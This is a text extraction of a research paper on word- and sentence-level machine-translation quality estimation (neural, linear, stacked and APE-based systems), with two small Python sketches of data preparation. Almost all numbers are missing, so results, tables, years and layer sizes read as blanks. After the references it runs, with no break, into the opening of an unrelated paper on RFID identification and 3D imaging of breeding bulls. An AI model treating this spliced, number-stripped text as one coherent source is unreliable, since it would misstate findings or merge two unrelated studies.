next, we describe the neural component of our pure qe system, which we call neuralqe. in wmt and wmt , the neural quetch system (kreutzer et al., ) and its ensemble with other neural models (martins et al., ) were components of the winning systems. however, none of these neural models managed to outperform a linear model when considered in isolation: for example, quetch obtained an f bad of . % in the wmt test set, far below the . % score of the linear system built by the same team. by contrast, our carefully engineered neuralqe model attains a performance superior to that of the linear system, as we shall see.

figure : architecture of our neuralqe system (source and target words and their pos tags are embedded and concatenated, then passed through feed-forward and bigru layers, ending in a softmax over the ok/bad labels).

architecture. the architecture of neuralqe is depicted in figure . we used keras (chollet, ) to implement our model. the system receives as input the source and target sentences s and t, their word-level alignments a, and their corresponding pos tags obtained from turbotagger. the input layer follows a similar architecture as quetch, with the addition of pos features. a vector representing each target word is obtained by concatenating the embedding of that word with those of the aligned word in the source (for the cases in which there are multiple source words aligned to the same target word, the embeddings are averaged). the immediate left and right contexts for source and target words are also concatenated. we use the pre-trained -dimensional polyglot word embeddings (al-rfou et al., ) for english, german, and spanish, and refine them during training. in addition to this, pos tags for each source and target word are also embedded and concatenated. pos embeddings have size and are initialized as described by glorot and bengio ( ). a dropout probability of . is applied to the resulting vector representations. the following layers are then applied in sequence:

1. two feed-forward layers of size with rectified linear units (relu; nair and hinton ( ));
2. a layer with bidirectional gated recurrent units (bigru, cho et al. ( )) of size , where forward and backward vectors are concatenated, trained with layer normalization (ba et al., );
3. two feed-forward relu layers of size ;
4. a bigru layer of size with identical configuration to the previous bigru;
5. two more feed-forward relu layers of sizes and , respectively.

as the output layer, a softmax transformation over the ok/bad labels is applied. the choice for this architecture was dictated by experiments on the wmt development data, as we explain next.

training. we train the model with the rmsprop algorithm (tieleman and hinton, ) by minimizing the cross-entropy with a linear penalty for bad word predictions, as in kreutzer et al. ( ). we set the bad weight factor to . . all hyperparameters are adjusted based on the development set. target sentences are bucketed by length and then processed in batches (without any padding or truncation).

results and architectural choices. the final results are shown in table . overall, the final neuralqe model achieves an f mult score of . % on the wmt development set, compared with the .
% obtained with the linearqe system (cf. table ). this contrasts with previous neural systems, such as quetch (kreutzer et al., ) and any of the three neural systems developed by martins et al. ( ), which could not outperform a rich feature linear classifier. to justify the most relevant choices regarding the architecture of neuralqe, we also evaluated sev- eral variations of it on the wmt development set. the use of recurrent layers yields the largest con- tribution to the performance of neuralqe, as the scores drop sharply (by more than points) if they are replaced by feed-forward layers (which would correspond to a mere deeper quetch model). the first bigru is particulary effective, as scores drop more than points if it is removed. the use of layer normalization on the recurrent layers also con- tributes positively (+ . ) to the final score. as ex- pected, the use of pos tags adds another large im- provement: everything staying the same, the model model f mult neuralqe . no pos tags . (- . ) replace bigru by ff . (- . ) only the first bigru . (- . ) only the second bigru . (- . ) remove ff between bigrus . (- . ) narrower layers . (- . ) broader layers . (- . ) one more layer at the end . (- . ) no layer normalization . (- . ) table : effect of architectural changes in neuralqe on the wmt development set. without pos tags as input performs almost . points worse. finally, varying the size of the hidden layers and the depth of the network hurts the final model’s performance, albeit more slightly. . stacking neural and linear models we now stack the neuralqe system (§ . ) into the linearqe system (§ . ) as an ensemble strat- egy; we call the resulting system stackedqe. stacking architectures (wolpert, ; breiman, ) have proved effective in structured nlp prob- lems (cohen and de carvalho, ; martins et al., ). the underlying idea is to combine two sys- tems by letting the prediction of the first system be used as an input feature for the second system. dur- ing training, it is necessary to jackknife the first sys- tem’s predictions to avoid overfitting the training set. this is done by splitting the training set in k folds (we set k = ) and training k different instances of the first system, where each instance is trained on k − folds and makes predictions for the left-out fold. the concatenation of all the predictions yields an unbiased training set for the second classifier. neural intra-ensembles. we also evaluate the performance of intra-ensembled neural systems. we train independent instances of neuralqe with dif- ferent random initializations and different data shuf- fles, following the approach of jean et al. ( ) in neural mt. in tables – , we report the performance on the wmt and wmt datasets of systems en- sembling and of these instances, called respec- tively neuralqe- and neuralqe- . the in- model f bad dev f bad test best system in wmt . - . quetch+ ( nd best) – . linearqe . . neuralqe . . neuralqe- . . neuralqe- . . stackedqe . . table : performance of the pure qe systems on the wmt datasets. the best performing system in the wmt competition was by esplà-gomis et al. ( ), followed by kreutzer et al. ( )’s quetch+, which is also an ensemble of a linear and a neural system. model f mult dev f mult test best system in wmt . . unbabel-linear ( nd best) . . linearqe . . neuralqe . . neuralqe- . . neuralqe- . . stackedqe . . table : performance of the pure qe systems on the wmt datasets. the best performing system in the wmt competition was by martins et al. 
( ), fol- lowed by a linear system developed by the same team (unbabel-linear). stances are ensembled by taking the averaged prob- ability of each word being bad. we see consistent benefits (both for wmt and wmt ) in ensem- bling neural systems and (somewhat surprisingly) some degradation with ensembles of . stacking architecture. the individual instances of the neural systems are incorporated in the stacking architecture as different features, yield- ing stackedqe. in total, we have predictions (probability values given by each neuralqe sys- tem) for every word in the training, development and test datasets. these predictions are plugged as addi- tional features in the linearqe model. as uni- gram features, we used one real-valued feature for every model prediction at each position, conjoined with the label. as bigram features, we used two real- valued features for every model prediction at the two positions, conjoined with the label pair. the results obtained with this stacked architecture on the wmt and wmt datasets are shown re- spectively in tables and . in wmt , it is un- clear if stacking helps over the best intra-ensembled neural system, with a slight improvement in the development set, but a degradation in the test set. in wmt , however, stacking is clearly beneficial, with a boost of about points over the best intra- ensembled neural system and – points above the linear system, both in the development and test par- titions. for the remainder of this paper, we will take stackedqe as our pure qe system. ape-based quality estimation now that we have described a pure qe system, we move on to an ape-based qe system (apeqe). our starting point is the system submitted by the adam mickiewicz university (amu) team to the ape task of wmt (junczys-dowmunt and grundkiewicz, ). they explored the applica- tion of neural translation models to the ape problem and achieved good results by treating different mod- els as components in a log-linear model, allowing for multiple inputs (the source s and the translated sentence t) that were decoded to the same target lan- guage (post-edited translation p). two systems were considered, one using s as the input (s → p) and another using t as the input (t → p). a simple string-matching penalty integrated within the log- linear model was used to control for higher faithful- ness with regard to the raw mt output. the penalty fires if the ape system proposes a word in its output that has not been seen in t. to overcome the problem of too little training data, junczys-dowmunt and grundkiewicz ( ) generated large amounts of artificial data via round- trip translations: a large corpus of monolingual sentences is first gathered for the target language in the domain of interest (each sentence is regarded as an artificial post-edited sentence p); then an mt sys- tem is ran to translate these sentences to the source language (which are regarded as the source sen- tences s), and another mt system in the reverse di- rection translates the latter back to the target lan- guage (playing the role of the translations t). the artificial data is filtered to match the hter statistics of the training and development data for the shared task. their submission improved over the uncor- rected baseline on the unseen wmt test set by - . % ter and + . % bleu and outperformed any other system submitted to the shared-task by a large margin. . 
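the round-trip construction just described can be summarized in a few lines: monolingual target-language sentences serve as artificial post-editions, and two mt systems produce the corresponding artificial source and translation, after which the triples are filtered by hter. the sketch below is only schematic and not the original pipeline; translate_to_source and translate_to_target stand for whatever mt systems are available, hter is passed in as a function, and the filtering range is a placeholder rather than the thresholds actually used.

```python
def make_roundtrip_triples(monolingual_target_sentences,
                           translate_to_source,   # hypothetical: target -> source MT
                           translate_to_target,   # hypothetical: source -> target MT
                           hter, keep_range=(0.0, 0.5)):
    """Build artificial (source s, translation t, post-edition p) triples.

    Each monolingual sentence is treated as an artificial post-edition p;
    it is translated into the source language (giving s) and back into the
    target language (giving t). Triples are kept only if HTER(t, p) falls in
    a range chosen to roughly match the statistics of the real data.
    """
    triples = []
    for p in monolingual_target_sentences:
        s = translate_to_source(p)      # artificial source sentence
        t = translate_to_target(s)      # artificial "raw MT" output
        if keep_range[0] <= hter(t, p) <= keep_range[1]:
            triples.append((s, t, p))
    return triples
```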
training the ape system we reproduce the experiments from junczys- dowmunt and grundkiewicz ( ) using nematus (sennrich et al., ) for training and amunmt (junczys-dowmunt et al., ) for decoding. as stated in § . , jackknifing is required to avoid overfitting during the training procedure of the stacked classifiers (§ ), therefore we start by prepar- ing four jackknifed models. we perform the follow- ing steps: • we divide the original wmt training set into four equally sized parts, maintaining correspon- dences between different languages. four new training sets are created by leaving out one part and concatenating the remaining three parts. • for each of the four new training sets, we train one ape model on a concatenation of a smaller set of artificial data (denoted as “round-trip.n ” in junczys-dowmunt and grundkiewicz ( ), consisting of , sentence triples) and a - fold oversampled new training set. each of these newly created four ape models has not seen a dif- ferent part of the quartered original training data. • to avoid overfitting, we use scaling dropout over gru steps and input embeddings, with dropout probabilities . , and over source and target words with probabilities . (sennrich et al., ). • we use adam (kingma and ba, ) instead of adadelta (zeiler, ). • we train both models (s → p and t → p) un- til convergence up to epochs, saving model checkpoints every , mini-batches. the artificial filtered data has been made available by the authors at https://github.com/emjotde/amunmt/ wiki/amunmt-for-automatic-post-editing. currently available in the mrt branch of nematus at https://github.com/rsennrich/nematus system wmt wmt best system . . uncorrected baseline . . ape t → p . . ape s → p . . ape ter-tuned . . table : ter scores on the official wmt and wmt test sets for the ape task. lower is better. • the last four model checkpoints of each train- ing run are averaged element-wise (junczys- dowmunt et al., ) resulting in new single models with generally improved performance. to verify the quality of the ape system, we en- semble the resulting models ( times s → p and times t → p) and add the ape penalty described in junczys-dowmunt and grundkiewicz ( ). this large ensemble across folds is only used during test time. for creating the jackknifed training data, only the models from the corresponding fold are used. since we combine models of different types, we tune weights on the development set with mert (och, ) towards ter, yielding the model denoted as “ape ter-tuned”. results are listed in table for the ape shared task (wmt ). for the purely s → p and t → p ensembles, models are weighted equally. we achieve slightly better results in terms of ter, the main task metric, than the original sys- tem, using less data. for completeness, we also apply this proce- dure to wmt data, generating a similar resource of k artificial english-spanish-spanish post- editing triplets via roundtrip translation. the train- ing, jackknifing and ensembling methods are the same as for the wmt setting. for the wmt ape shared task, results are less persuasive than for wmt : none of the shared task participants was able to beat the uncorrected baseline and our sys- tem fails at this as well. however, we produced the we found mert to work better when tuning towards ter than kb-mira which has been used in the original paper. our artificially created data might suffer from a higher mis- match between training and development data. 
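the jackknifing scheme above (four leave-one-out training sets, each later used to post-edit the quarter its model has not seen) is mechanical enough to sketch. the snippet below is an illustration under simplifying assumptions: the training data is a plain list of triples, and the oversampling factor is a parameter rather than the exact value used in the experiments.

```python
def jackknife_folds(training_triples, artificial_triples, n_folds=4, oversample=1):
    """Create leave-one-out training sets for jackknifed APE models.

    Returns a list of (train_set, held_out) pairs: each APE model is trained
    on the artificial round-trip data plus an oversampled copy of three
    quarters of the original data, and is later used to post-edit the
    remaining, unseen quarter.
    """
    fold_size = len(training_triples) // n_folds
    folds = [training_triples[i * fold_size:(i + 1) * fold_size]
             for i in range(n_folds)]
    jackknifed = []
    for k in range(n_folds):
        held_out = folds[k]
        rest = [ex for i, fold in enumerate(folds) if i != k for ex in fold]
        train_set = list(artificial_triples) + rest * oversample
        jackknifed.append((train_set, held_out))
    return jackknifed
```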
while we were able to match the ter statistics of the dev set, bleu scores are several points lower. the artificial wmt data we created in junczys-dowmunt and grundkiewicz ( ) matches both, ter and bleu scores, of the respective development set. f bad dev f bad test ape t → p . . ape s → p . . ape ter-tuned . . apeqe . . table : performance of ape-based qe systems on the wmt development and test sets. f mult dev f mult test ape t → p . . ape s → p . . ape ter-tuned . . apeqe . . table : performance of ape-based qe systems on the wmt development and test sets. second strongest system for case-sensitive ter (ta- ble , wmt ) and the strongest for case-insensitve ter ( . vs. . ). . adaptation to qe and task-specific tuning as described in § , ape outputs can be turned into word quality labels using ter-based word align- ments. somewhat surprisingly, among the ape sys- tems introduced above, we observe in table that the s → p ape system is the so-far strongest stand- alone qe system for the wmt task in this work. this system is essentially a retrained neural mt component without any additional features. the t → p system and the ter-tuned ape ensemble are much weaker in terms of f mult . this is less surprising in the case of the full ensemble, as it has been tuned towards ter for the ape task specif- ically. however, we can obtain even better ape- based qe systems for both shared task settings by tuning the full ape ensembles towards f mult , the official wmt qe metric, and towards f bad for wmt . with this approach, we produce our new best stand-alone qe-systems for both shared tasks, which we denote as apeqe. note that this system resembles other qe approaches which use pseudo-reference features (albrecht and hwa, ; soricut and narsale, ; shah et al., ), since the s → p is essentially an “alternative” mt system. using again mert and executing iterations on the offi- cial development set with an n-best list size of . f bad dev f bad test best system in wmt . . linearqe . . neuralqe . . stackedqe . . apeqe . . fullstackedqe . . table : performance of the several word-level qe sys- tems on the wmt development and test datasets. the baseline is the best participating system in wmt , from esplà-gomis et al. ( ). full stacked system finally, we consider a larger stacked system where we stack both neuralqe and apeqe into lin- earqe. this will mix pure qe with ape-based qe systems; we call the result fullstackedqe. the procedure is analogous to that described in § . , with one extra binary feature for the ape-based word quality label predictions. for training, we used jackknifing as described in § . . . word-level qe the performance of the fullstackedqe system on the wmt and wmt datasets are shown in tables – . we compare with the other systems introduced in this paper, and with the best partici- pating systems at wmt – (esplà-gomis et al., ; martins et al., ). we can see that the ape-based and the pure qe systems are complementary: the full combination of the linear, neural, and ape-based systems improves the scores with respect to the best individual sys- tem (apeqe) by about point in wmt and points in wmt . overall, we obtain for wmt an f mult score of . %, a new state of the art, and an absolute gain of + . % over martins et al. ( ). this is a remarkable improvement that can pave the way for a wider adoption of word-level qe systems in industrial settings. for wmt , we also obtain a new state of the art, with a less impres- sive gain of + . % over the best previous system. 
in § we analyze the errors made by the pure and the ape-based qe systems to better understand how they complement each other. f mult dev f mult test best system in wmt . . linearqe . . neuralqe . . stackedqe . . apeqe . . fullstackedqe . . table : performance of the several word-level qe sys- tems on the wmt development and test datasets. the baseline is the best participating system in wmt , from the unbabel team (martins et al., ). . sentence-level qe encouraged by the strong results obtained with the fullstackedqe system in word-level qe, we in- vestigate how we can adapt this system for hter prediction at sentence level. prior work (de souza et al., ) incorporated word-level quality pre- dictions as features in a sentence-level qe system, training a feature-based linear classifier. here, we show that a very simple conversion, which requires no training or tuning, is enough to obtain a substan- tial improvement over the state of the art. for the ape system, it is easy to obtain a predic- tion for hter: we can simply measure the hter between the translated sentence t and the predicted corrected sentence p̂. for a pure qe system, we ap- ply the following word-to-sentence conversion tech- nique: (i) run a qe system to obtain a sequence of ok and bad word quality labels; (ii) use the frac- tion of bad labels as an estimate for hter. note that this procedure, while not requiring any training, is far from perfect. words that are not in the trans- lated sentence but exist in the reference post-edited sentence do not originate bad labels, and therefore will not contribute to the hter estimate. yet, as we will see, this procedure applied to the stackedqe system (i.e. without the apeqe component) is al- ready sufficient to obtain state of the art results. fi- nally, to combine the ape and pure qe systems to- ward sentence-level qe, we simply take the average of the two hter predictions above. table shows the results obtained with our pure qe system (stackedqe), with our ape- based system (apeqe), and with the combination of the two (fullstackedqe). as baselines, we pearson dev pearson test spearman dev spearman test wmt best system in wmt (ranking) – . – . best system in wmt (hter) – . – . stackedqe . . . . apeqe . . . . fullstackedqe . . . . wmt best system in wmt (ranking) – . – – best system in wmt (hter) – . – . stackedqe . . . . apeqe . . . . fullstackedqe . . . . table : performance of our sentence-level qe systems on the wmt an wmt datasets, as measured by the wmt official evaluation script. the baselines are the best wmt – systems in the hter prediction track (bicici et al., ; kozlova et al., ) and in the sentence ranking track (langlois, ; kim and lee, ). report the performance of the two best systems in the sentence-level qe tasks at wmt and wmt (bicici et al., ; langlois, ; kozlova et al., ; kim and lee, ). the results are striking: for wmt , even our weakest system (stackedqe) with the simple con- version procedure above is already sufficient to ob- tain state of the art results, outperforming kozlova et al. ( ) and kim and lee ( ) by a considerable margin. the apeqe system gives a very large boost over these scores, which are further increased by the combined fullstackedqe system. overall, we obtain absolute gains of + . % in pearson’s r cor- relation score for hter prediction, and + . % in spearman’s ρ correlation for sentence ranking, a considerable advance over the previous state of the art. 
for wmt , we also obtain a new state of the art, with less sharp (but still significant) improve- ments: + . % in pearson’s r correlation score, and + . % in spearman’s ρ correlation. error analysis performance over sentence length. to better un- derstand the differences in performance between the pure qe system (stackedqe) and the ape-based system (apeqe), we analyze how the two systems, as well as their combination (fullstackedqe), perform as a function of the sentence length. figure shows the averaged number of bad pre- dictions made by the three systems for different sen- tences lengths, in the wmt development set. for comparison, we show also the true average num- ber of bad words in the gold standard. we ob- serve that, for short sentences (less than words), the pure qe system tends to be too optimistic (i.e., it underpredicts bad words) and the ape-based sys- tem too pessimistic (overpredicting them). in the range of - words, the pure qe system matches the proportion of bad words more accurately than the ape-based system. for medium/long sentences, we observe the opposite behavior (this is partic- ularly clear in the - word range), with the ape-based system being generally better. on the other hand, the combination of the two systems (fullstackedqe) manages to find a good bal- ance between these two biases, being much closer to the true proportion of bad labels for both shorter and longer sentences than any of the individual sys- tems. this shows that the two systems complement each other well in the combination. illustrative examples. table shows concrete examples of quality predictions on the wmt de- velopment data. in the top example, we can see that the ape system correctly replaced angleichungs- farbe by mischfarbe, but is under-corrective in other parts. the apeqe system therefore misses several bad words, but manages to get the correct label (ok) for den. by contrast, the pure qe system er- roneously flags this word as incorrect, but it makes the right decision on farbton and zu erstellen, be- ing more accurate than apeqe. the combination of the two systems (pure qe and apeqe) leads to source combines the hue value of the blend color with the luminance and saturation of the base color to create the result color . mt kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grundfarbe zu erstellen . pe (reference) kombiniert den farbtonwert der mischfarbe mit der luminanz und sättigung der grundfarbe . ape kombiniert den farbton der mischfarbe mit der luminanz und die sättigung der grundfarbe , um die ergebnisfarbe zu erstellen . stackedqe kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grund- farbe zu erstellen . apeqe kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grund- farbe zu erstellen . fullstackedqe kombiniert den farbton wert der angleichungsfarbe mit der luminanz und sättigung der grund- farbe zu erstellen . source the video preview plug - in supports rgb , grayscale , and indexed images . mt mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . pe (reference) das zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . ape das dialogfeld “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . stackedqe mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . 
apeqe mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . fullstackedqe mit dem zusatzmodul “ videovorschau ” unterstützt rgb- , graustufen- und indizierte bilder . table : examples on wmt validation data. shown are the source and translated sentences, the gold post-edited sentences, the output of the ape system, and the qe predictions of our pure qe and ape-based qe systems as well as their combination. words predicted as ok are shown in green, those predicted as bad are shown in red, and differences between the translated and the post-edited sentences are shown in blue. for both examples, the full stacked system predicts all quality labels correctly. figure : averaged number of words predicted as bad by the different systems in the wmt gold dev set, for different bins of the sentence length. the correct sequential prediction. in the bottom ex- ample, the pure qe system assigns the correct label to zusatzmodul, while the ape system mistranslates this word to dialogfeld, leading to a wrong predic- tion by the apeqe system. on the other hand, pure qe misclassifies unterstützt rgb- as bad words, while the apeqe gets them right. overall, the apeqe is more accurate in this example. again, these decisions complement each other well, as can be seen by the combined qe system which outputs the correct word labels for the entire sentence. conclusions we have presented new state of the art systems for word-level and sentence-level qe that are consid- erably more accurate than previous systems on the wmt and wmt datasets. first, we proposed a new pure qe system which stacks a linear and a neural system, and is simpler and slighly more accurate than the currently best word-level system. then, by relating the tasks of ape and word-level qe, we derived a new ape- based qe system, which leverages additional artifi- cial roundtrip translation data, achieving a larger im- provement. finally, we combined the two systems via a full stacking architecture, boosting the scores even further. error analysis shows that the pure and ape-based systems are highly complementary. the full system was extended to sentence-level qe by virtue of a simple word-to-sentence conversion, re- quiring no further training or tuning. acknowledgments we thank the reviewers and the action edi- tor for their insightful comments. this work was partially supported by the the expert project (eu marie curie itn no. ), and by fundação para a ciência e tecnolo- gia (fct), through contracts uid/eea/ / and uid/cec/ / , the learnbig project (ptdc/eei-sii/ / ), the golocal project (grant cmuperi/tic/ / ), and the amazon academic research awards program. references rami al-rfou, bryan perozzi, and steven skiena. . polyglot: distributed word representations for multi- lingual nlp. in proceedings of the seventeenth con- ference on computational natural language learn- ing, pages – . joshua albrecht and rebecca hwa. . the role of pseudo references in mt evaluation. in proceedings of the third workshop on statistical machine transla- tion, pages – . eleftherios avramidis. . quality estimation for machine translation output using linguistic analysis and decoding features. in proceedings of the seventh workshop on statistical machine translation, pages – . jimmy lei ba, jamie ryan kiros, and geoffrey e hin- ton. . layer normalization. arxiv preprint arxiv: . . daniel beck, kashif shah, trevor cohn, and lucia spe- cia. . shef-lite: when less is more for transla- tion quality estimation. 
in proceedings of the eighth workshop on statistical machine translation, pages – . ergun bicici, qun liu, and andy way. . refer- ential translation machines for predicting translation quality and related statistics. in proceedings of the tenth workshop on statistical machine translation, pages – . ergun biçici. . referential translation machines for quality estimation. in proceedings of the eighth work- shop on statistical machine translation, pages – . john blatz, erin fitzgerald, george foster, simona gan- drabur, cyril goutte, alex kulesza, alberto sanchis, and nicola ueffing. . confidence estimation for machine translation. in proceedings of the interna- tional conference on computational linguistics, page . ondřej bojar, rajan chatterjee, christian federmann, barry haddow, chris hokamp, matthias huck, var- vara logacheva, , philipp koehn, , christof monz, matteo negri, pavel pecina, matt post, carolina scar- ton, lucia specia, and marco turchi. . findings of the workshop on statistical machine transla- tion. in proceedings of the tenth workshop on statis- tical machine translation, pages – . ondřej bojar, rajen chatterjee, christian federmann, yvette graham, barry haddow, matthias huck, anto- nio jimeno yepes, philipp koehn, varvara logacheva, christof monz, matteo negri, aurelie neveol, mari- ana neves, martin popel, matt post, raphael rubino, carolina scarton, lucia specia, marco turchi, karin verspoor, and marcos zampieri. . findings of the conference on machine translation. in pro- ceedings of the first conference on machine transla- tion, pages – . leo breiman. . stacked regressions. machine learning, : – . kyunghyun cho, bart van merriënboer, caglar gul- cehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. . learning phrase representations using rnn encoder-decoder for sta- tistical machine translation. in proceedings of empir- ical methods in natural language processing, pages – . françois chollet. . keras. https://github. com/fchollet/keras. william w. cohen and vitor r. de carvalho. . stacked sequential learning. in proceedings of in- ternational joint conference on artificial intelligence, pages – . koby crammer, ofer dekel, joseph keshet, shai shalev- shwartz, and yoram singer. . online passive- aggressive algorithms. journal of machine learning research, : – . josé g. c. de souza, jesús gonzález-rubio, christian buck, marco turchi, and matteo negri. . fbk- upv-uedin participation in the wmt quality esti- mation shared-task. in proceedings of the ninth work- shop on statistical machine translation, pages – . josé g. c. de souza, marcello federico, and has- san sawaf. . mt quality estimation for e- commerce data. in proceedings of mt summit xv, vol. : mt users’ track, pages – . miquel esplà-gomis, felipe sánchez-martı́nez, and mikel forcada. . ualacant word-level machine translation quality estimation system at wmt . in proceedings of the tenth workshop on statistical machine translation, pages – . xavier glorot and yoshua bengio. . understanding the difficulty of training deep feedforward neural net- works. in international conference on artificial intel- ligence and statistics, pages – . yvette graham. . improving evaluation of machine translation quality estimation. in proceedings of the annual meeting of the association for computational linguistics, pages – . sébastien jean, orhan firat, kyunghyun cho, roland memisevic, and yoshua bengio. . montreal neu- ral machine translation systems for wmt . 
in pro- ceedings of the tenth workshop on statistical machine translation, pages – . marcin junczys-dowmunt and roman grundkiewicz. . log-linear combinations of monolingual and bilingual neural machine translation models for auto- matic post-editing. in proceedings of the first confer- ence on machine translation, pages – . marcin junczys-dowmunt, tomasz dwojak, and hieu hoang. . is neural machine translation ready for deployment? a case study on translation directions. arxiv preprint arxiv: . . hyun kim and jong-hyeok lee. . recurrent neural network based translation quality estimation. in pro- ceedings of the first conference on machine transla- tion, pages – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . anna kozlova, mariya shmatova, and anton frolov. . ysda participation in the wmt quality es- timation shared task. in proceedings of the first con- ference on machine translation, pages – . julia kreutzer, shigehiko schamoni, and stefan riezler. . quality estimation from scratch (quetch): deep learning for word-level translation quality es- timation. in proceedings of the tenth workshop on statistical machine translation, pages – . david langlois. . loria system for the wmt quality estimation shared task. in proceedings of the tenth workshop on statistical machine transla- tion, pages – . ngoc quang luong, laurent besacier, and benjamin lecouteux. . lig system for word level qe task at wmt . in proceedings of the ninth work- shop on statistical machine translation, pages – . andré f. t. martins, dipanjan das, noah a. smith, and eric p. xing. . stacking dependency parsers. in proceedings of empirical methods for natural lan- guage processing, pages – . andré f. t martins, miguel b. almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in proceedings of the annual meeting of the association for computational linguistics, pages – . andré f. t. martins, ramón astudillo, chris hokamp, and fabio n. kepler. . unbabel’s participation in the wmt word-level translation quality estima- tion shared task. in proceedings of the first confer- ence on machine translation, pages – . vinod nair and geoffrey e hinton. . rectified lin- ear units improve restricted boltzmann machines. in proceedings of the international conference on ma- chine learning, pages – . franz josef och. . minimum error rate training in statistical machine translation. in proceedings of the annual meeting on association for computational linguistics, pages – . raphael rubino, jennifer foster, joachim wagner, jo- hann roturier, rasul samad zadeh kaljahi, and fred hollowood. . dcu-symantec submission for the wmt quality estimation task. in proceedings of the seventh workshop on statistical machine transla- tion, pages – . rico sennrich, barry haddow, and alexandra birch. . edinburgh neural machine translation systems for wmt . in proceedings of the first conference on machine translation, pages – . kashif shah, trevor cohn, and lucia specia. . an investigation on the effectiveness of features for trans- lation quality estimation. in proceedings of the ma- chine translation summit, volume , pages – . michel simard, nicola ueffing, pierre isabelle, and roland kuhn. . rule-based translation with sta- tistical phrase-based post-editing. in proceedings of the second workshop on statistical machine transla- tion, pages – . matthew snover, bonnie dorr, richard schwartz, lin- nea micciulla, and john makhoul. . 
a study of translation edit rate with targeted human annotation. in proceedings of the th conference of the associa- tion for machine translation in the americas, pages – . radu soricut and sushant narsale. . combining quality prediction and system selection for improved automatic translation output. in proceedings of the seventh workshop on statistical machine translation, pages – . lucia specia, kashif shah, jose g.c. de souza, and trevor cohn. . quest - a translation quality estimation framework. in proceedings of the annual meeting of the association for computational linguis- tics: system demonstrations, pages – . lucia specia. . exploiting objective annotations for measuring translation post-editing effort. in proceed- ings of the th conference of the european associa- tion for machine translation, pages – . tijmen tieleman and geoffrey hinton. . rmsprop: divide the gradient by a running average of its recent magnitude. coursera: neural networks for ma- chine learning, ( ). marco turchi, antonios anastasopoulos, josé gc de souza, and matteo negri. . adaptive qual- ity estimation for machine translation. in proceedings of the annual meeting of the association for compu- tational linguistics, pages – . nicola ueffing and hermann ney. . word-level confidence estimation for machine translation. com- putational linguistics, ( ): – . d. wolpert. . stacked generalization. neural net- works, ( ): – . matthew d. zeiler. . adadelta: an adaptive learning rate method. arxiv preprint arxiv: . . submitted october accepted february published march corresponding author maria grazia cappai, mgcappai@uniss.it academic editor claudia bauzer medeiros additional information and declarations can be found on page doi . /peerj-cs. copyright cappai et al. distributed under creative commons cc-by . open access integrating the rfid identification system for charolaise breeding bulls with d imaging for virtual archive creation maria grazia cappai , filippo gambella , davide piccirilli , nicola graziano rubiu , corrado dimauro , antonio luigi pazzona and walter pinna research unit for animal nutrition, department of veterinary medicine, university of sassari, sassari, italy research unit for agriculture engineering of the department of agriculture, university of sassari, sassari, italy nureid foundation, nuragus, italy research unit for animal breeding sciences of the department of agriculture, university of sassari, sassari, italy abstract the individual electronic identification (eid) of cattle based on rfid technology ( . khz iso standard ) will definitely enter into force in european countries as an official means of animal identification from july . integrating eid with d digital images of the animal would lead to the creation of a virtual archive of breeding animals for the evaluation and promotion of morphology associated with economic traits, strategic in beef cattle production. the genetically-encoded morphology of bulls and cows together with the expression in the phenotype were the main drivers of omic technologies of beef cattle production. the evaluation of bulls raised for reproduction is mainly based on the conformation and heritability of traits, which culminates in muscle mass and optimized carcass traits in the offspring destined to be slaughtered. a bottom- up approach by way of swot analysis of the current morphological and functional evaluation process for bulls revealed a technological gap. the innovation of the process through the use of smart technologies was tested in the field. 
the conventional d scoring system based on visual inspection by breed experts was carried out on a d model of the live animal, which was found to be a faithful reproduction of live animal morphology, thanks to the non significant variance (p > . ) of means of the somatic measures determined on the virtual d model and on the real bull. the four main groups composing the scoring system of bull morphology can easily be carried out on the d model. these are as follows: ( ) muscular condition; ( ) skeletal development; ( ) functional traits; ( ) breed traits. the d-bull model derived from the structure from motion (sfm) algorithm displays a high tech profile for the evaluation of animal morphology in an upgraded system. subjects bioinformatics, computer vision, data science, spatial and geographic information systems keywords electronic identification, digital image, bull morphology, data sharing, stakeholder, d digital image how to cite this article cappai mg, gambella f, piccirilli d, rubiu ng, dimauro c, pazzona al, pinna w. . integrating the rfid identification system for charolaise breeding bulls with d imaging for virtual archive creation. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:mgcappai@uniss.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction the current identification system for cattle in european union countries will be modified starting from th july , the date on which eu reg / will be implemented. the individual electronic identification (eid) of cattle based on radio frequency technology (rfid, . khz) will become an official means of cattle identification, in addition to the double plastic ear tag identification system (eu reg / ). the automatic rfid- based identification of cattle will be part of the innovation process of animal recording, encompassing a digitized and real time automatically generated database, within the so-called precision livestock farming (plf). in view of the potential offered by rfid technology, several perspectives may lead to advanced production systems, of particular importance both for regulation compliance and the profitable management of herds. in this scenario, production goals differ depending on whether dairy or beef cattle are considered. modern beef cattle production relies on decades of animal selection, oriented to the improvement of breeding system efficiency, basically to reduce costs and increase profits. bovine breeds display morphological differences relating to production goals, if dairy or beef cattle are considered. in particular, beef cattle breeds are selected to improve carcass worth and the evaluation of body morphology of the live animal encompasses the interplay between genetic selection, breeding practices and expression of desirable traits. in , nkrumah and coworkers correlated genetic and phenotypic behaviour based on economically relevant traits (ert) in angus and charolaise breeds, including feed intake, feed conversion ratio, fertility and temperament as those with a direct impact on the management and sustainability of the beef cattle farming system. the genetic value of animals is meant to spread to the whole herd since the productivity and sustainability of the farm does not rely on the single individual. 
